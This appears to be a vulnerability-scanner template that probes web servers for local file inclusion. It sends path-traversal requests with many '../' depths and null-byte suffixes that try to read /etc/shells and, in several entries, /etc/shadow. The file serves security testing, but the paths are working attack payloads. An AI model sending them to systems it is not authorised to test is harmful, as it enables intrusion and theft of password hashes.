id: LFI-59
info:
  author: 0x71rex
  name: Local File Inclusion
  severity: high
requests:
- matchers:
  - condition: and
    part: body
    type: word
    words:
    - '# valid login shells'
    - /bin/sh
    - /bin/ash
    - /bin/bash
  method: GET
  path:
  - '{{BaseURL}}/etc/shells'
  - '{{BaseURL}}/etc/shadow%00'
  - '{{BaseURL}}/etc/shells'
  - '{{BaseURL}}/etc/shells%00'
  - '{{BaseURL}}../etc/shells'
  - '{{BaseURL}}../etc/shells%00'
  - '{{BaseURL}}../../etc/shells'
  - '{{BaseURL}}../../etc/shells%00'
  - '{{BaseURL}}../../../etc/shells'
  - '{{BaseURL}}../../../etc/shells%00'
  - '{{BaseURL}}../../../../etc/shells'
  - '{{BaseURL}}../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../etc/shells'
  - '{{BaseURL}}../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shells'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shells%00'
  - '{{BaseURL}}../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00'
  - '{{BaseURL}}../../../../../../etc/shells&=%3C%3C%3C%3C'
